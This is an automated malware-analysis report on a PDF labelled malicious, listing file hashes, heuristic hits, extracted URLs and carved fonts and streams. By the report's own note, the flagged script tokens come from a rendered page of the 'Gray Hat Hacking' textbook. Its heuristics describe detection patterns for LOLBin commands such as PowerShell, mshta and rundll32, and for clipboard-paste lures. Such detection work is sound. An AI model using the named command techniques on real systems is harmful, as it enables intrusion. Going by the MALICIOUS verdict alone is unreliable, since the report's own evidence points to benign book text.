Malicious PDF — malware analysis report

Static analysis result for SHA-256 976ee6efc98b807c…

Verdict: MALICIOUS

File type: PDF

Size: 12.21 MB
First seen: 2015-09-15
MD5: b89a1e16ad8cb8cd6ff53507befcc82c
SHA-1: fda84940ea6aa8967d0216ef1dbcb85ae1ee3767
SHA-256: 976ee6efc98b807ceee03c2e79bdc27e58ab9d0ab6e70944ed53d941574263a2

Risk Score: 170

Machine Learning

  • Nyx PDF Classifier suspicious score 0.4662

Heuristics (7)

  • Embedded script payload in PDF stream [high] PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
  • Clipboard command execution lure [high] SE_CLIPBOARD_COMMAND_LURE
    Document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context.
  • LOLBin token sequence in document text [high] SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or, in macro-laden Office files, the macro's own string-pool entries appearing adjacent in extracted text.
  • Unusually high stream count [medium] PDF_MANY_STREAMS
    PDF contains 501+ stream objects, which may indicate heap spray or heavy obfuscation.
  • Suspicious extracted artifact [medium] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Urgency / deadline lure [low] SE_URGENCY_LURE
    Document contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.). This is useful context, but low-signal without other findings.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL (channel)
    • http://logicalsecurity.com/cissp (in PDF document text)
    • http://attrition.org/errata/legal_threats/ (in PDF document text)
    • http://mioglobal.com (in PDF document text)
    • http://isorecorder.alex- (in PDF document text)
    • http://isorecorder.alexfeinman.com/isorecorder.htm (in PDF document text)
    • http://www.ftc.gov/bcp/edu/ (in PDF document text)
    • http://searchwindowssecurity.techtarget.com/ (in PDF document text)
    • http://w2.eff.org/ (in PDF document text)
    • http://www.mozilla.org/security/bug-bounty.html (in PDF document text)
    • http://u3.sandisk.com/download/lp_installer.asp?custom=1.6.1.2&brand=PelicanBFG (in PDF document text)
    • http://mp3support.sandisk.com/downloads/ (in PDF document text)
    • http://unetbootin.sourceforge.net (in PDF document text)
    • http://download.virtualbox.org/virtualbox/3.1.6/ (in PDF document text)
    • https://help.ubuntu.com/community/LiveCD/Persistence (in PDF document text)
    • http://archive.offensive-security.com (in PDF document text)
    • http://www.iec.ch (in PDF document text)

Extracted artifacts (32)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size (each row's SHA-256 follows on the next line)
stream_018_off00010be7.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x10BE7 5543 bytes
SHA-256: f1c74457fb9fc4e8d2feb15b49f92428a2378ce19e0b134ce914342dd91e5061
stream_163_off001293d2.bin decompressed-pdf-stream PDF FlateDecoded stream at offset 0x1293D2 225792 bytes
SHA-256: 24d9b6be636885c91a0118a3ad5595f05b58a35fc57c78057d442d75d8c54f0c
embedded_pdf_script_00132306.bin pdf-embedded-script PDF decompressed stream script payload at offset 0x132306 6839 bytes
SHA-256: 6ce044aaaa5e227794b281c7828b8847eb7403680366b2eaceeb6ed57e99c30a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 shell/COM execution token(s).
Preview script
First 1,000 lines of the extracted script. The carved stream is a PDF page content stream (BT/ET text-showing operators and line-drawing operators) that renders page 84 of "Gray Hat Hacking, The Ethical Hacker's Handbook, Third Edition"; that page reproduces a U3 autorun.inf listing and a go.vbs VBScript listing, and the WScript.Shell / CreateObject / objShell.Run tokens counted above occur inside that rendered book text rather than in a separately executable script object.
icc_00_off0000ae09.icc pdf-icc-profile PDF ICC profile at offset 0xAE09 3144 bytes
SHA-256: 2b3aa1645779a9e634744faf9b01e9102b0c9b88fd6deced7934df86b949af7e
font_00_cff_off0000137e.bin pdf-font-stream PDF embedded font (cff) at offset 0x137E 1286 bytes
SHA-256: 8f9c632df3c537842e5b997664a39bab94a2360a23d344b69fe83dea3abb4e3a
font_01_cff_off00001f9d.bin pdf-font-stream PDF embedded font (cff) at offset 0x1F9D 4441 bytes
SHA-256: 39866c982cce9b95edaf1f108ad6122b6413dbfa21176f0913a4307c8a033ea4
font_02_cff_off000039f5.bin pdf-font-stream PDF embedded font (cff) at offset 0x39F5 11150 bytes
SHA-256: 202c94db7816df5db504155d107a1a844d838df44bb3a66aa39eee12298b9b61
font_03_cff_off00006359.bin pdf-font-stream PDF embedded font (cff) at offset 0x6359 8521 bytes
SHA-256: c1c84a0d9b9d7fc6716270c07d4268f75f88feeea393763d7783ad847bf9dfad
font_04_cff_off000089ad.bin pdf-font-stream PDF embedded font (cff) at offset 0x89AD 10398 bytes
SHA-256: d7e5f7db1cf54102d21d5f49223aa2cd80b8e2aec0cbcfc6c7b5a989307d48f3
font_05_sfnt_off0000bb1b.bin pdf-font-stream PDF embedded font (sfnt) at offset 0xBB1B 24420 bytes
SHA-256: 1e1032c2b85d078406acde410a7dfe83d3d3a6165c63dacdbeb98bbb994309c8
font_07_sfnt_off000131b7.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x131B7 63712 bytes
SHA-256: fd8b3f23a2f018b241c4a5cc3fa853434f15a039a62db3db9313a0c80972b8e4
font_08_sfnt_off0001c8bf.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x1C8BF 24092 bytes
SHA-256: aa86d7c97a3ce253a8dded92749757db54f09480f921979ce0819b8fb3b7238b
font_09_cff_off00020b44.bin pdf-font-stream PDF embedded font (cff) at offset 0x20B44 19855 bytes
SHA-256: e4f5509fa3526b6f8450a914a1ff150b6bf03291f4b8c8fecf276253ea3c465e
font_10_cff_off00024748.bin pdf-font-stream PDF embedded font (cff) at offset 0x24748 19331 bytes
SHA-256: 4e8720a850e20cb09242a8f13c1e8d972f5ad9ec7216b6a0f6aad9b7af4814f5
font_11_cff_off000544f9.bin pdf-font-stream PDF embedded font (cff) at offset 0x544F9 1313 bytes
SHA-256: 89726ea9ec1699a9aa015f1c4de4bd4cb4e2d66b40776698c181b6efc3fad78a
font_12_cff_off00054f76.bin pdf-font-stream PDF embedded font (cff) at offset 0x54F76 4483 bytes
SHA-256: 75b42bfd8f007500500eba477d10c97d79699fbf0a17949ae091e0f1f5658e46
font_13_cff_off00056517.bin pdf-font-stream PDF embedded font (cff) at offset 0x56517 2762 bytes
SHA-256: 57f54bbd462e3241568af35ed8c5306620c7a746da947c8472ee1b2201f7e32b
font_14_cff_off0007c914.bin pdf-font-stream PDF embedded font (cff) at offset 0x7C914 20451 bytes
SHA-256: f7a8d68b2c1225c12a651d28739d0c1a04a368de8152ed59d807b3ffecf6d245
font_15_cff_off000bd277.bin pdf-font-stream PDF embedded font (cff) at offset 0xBD277 5762 bytes
SHA-256: e3504ff5921e45f6de6abf80a1ff8bb6d18eb7251a5e3659a36dd4c5f1c8c193
font_16_cff_off000bf1e7.bin pdf-font-stream PDF embedded font (cff) at offset 0xBF1E7 1110 bytes
SHA-256: 28537943d6ce0208e8439bde3bd408e1749d12b50b72c8a1c80194b25e4d68f8
font_17_cff_off000c00e7.bin pdf-font-stream PDF embedded font (cff) at offset 0xC00E7 6696 bytes
SHA-256: 80361b75aa71376ddfc7320848678fd5e2de98549235a7653f8df944d8cfc78c
font_18_cff_off000cb82d.bin pdf-font-stream PDF embedded font (cff) at offset 0xCB82D 838 bytes
SHA-256: f1a4e4a4b556df645361ff9a614a7a75ed59aab975f915aeb9f3f500ac428d1c
font_19_cff_off000cbf3f.bin pdf-font-stream PDF embedded font (cff) at offset 0xCBF3F 319 bytes
SHA-256: 7f43f8ddcf133d193b31a89705d1517a3fbb300c01e1634f34dbb5a10a75fda0
font_20_cff_off000ce00d.bin pdf-font-stream PDF embedded font (cff) at offset 0xCE00D 5835 bytes
SHA-256: b172aa00a43caab8cdd21b93e6fc84b530945778eb91d8f3562b473e366a2bcf
font_21_cff_off000f0613.bin pdf-font-stream PDF embedded font (cff) at offset 0xF0613 2499 bytes
SHA-256: b315c89deffd59b19b209d43eb03c51fca9b6a9e0a8c942598d7cb8e8eee5348
font_22_cff_off001326d9.bin pdf-font-stream PDF embedded font (cff) at offset 0x1326D9 21748 bytes
SHA-256: 47a51045562980291024c24d77073d5da9dab0dfb5e95dc0b07624dd669089ea
font_23_cff_off001978e5.bin pdf-font-stream PDF embedded font (cff) at offset 0x1978E5 15694 bytes
SHA-256: 70090ace14ba234aac2d463cfe1adec4a62f9cd789915d9413b44553804d7268
font_24_cff_off0020345b.bin pdf-font-stream PDF embedded font (cff) at offset 0x20345B 6720 bytes
SHA-256: 50686e2e0a73635ad7434206e24ca0960f780c79a68e203ebc8c2845d4cce79b
font_25_cff_off003c2f52.bin pdf-font-stream PDF embedded font (cff) at offset 0x3C2F52 265 bytes
SHA-256: b90f75ee12925575b9a25e133366ae4ae5703b73a6e18bdf5a010f3da87d1530
font_26_cff_off003ebb75.bin pdf-font-stream PDF embedded font (cff) at offset 0x3EBB75 12452 bytes
SHA-256: f1a3caf1260dd0d86057b796153c30b0266b769ddad027b9663afe6df14a0a9d
font_27_cff_off00464c23.bin pdf-font-stream PDF embedded font (cff) at offset 0x464C23 1694 bytes
SHA-256: 223597bdefa86e5f025f0c6ea6985f3400822230051e5dac063e8df3ec1675ea
font_28_cff_off0069e716.bin pdf-font-stream PDF embedded font (cff) at offset 0x69E716 6221 bytes
SHA-256: a13529c77b9490d2751b0155aed1fc60357353dda23266c2c7879e810d28c278